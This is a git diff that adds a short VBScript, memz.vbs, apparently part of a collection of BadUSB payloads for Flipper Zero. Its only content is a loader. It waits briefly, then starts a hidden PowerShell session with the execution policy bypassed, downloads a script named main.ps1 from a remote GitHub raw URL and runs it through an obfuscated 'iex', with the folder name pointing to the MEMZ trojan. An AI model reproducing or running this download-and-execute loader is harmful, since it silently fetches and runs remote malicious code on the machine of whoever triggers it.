diff --git a/MEMZ-In-Powershell/memz.vbs b/MEMZ-In-Powershell/memz.vbs new file mode 100644 index 0000000..7e64bd3 --- /dev/null +++ b/MEMZ-In-Powershell/memz.vbs @@ -0,0 +1,4 @@ +Set WshShell = WScript.CreateObject("WScript.Shell") +WScript.Sleep 200 +WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True +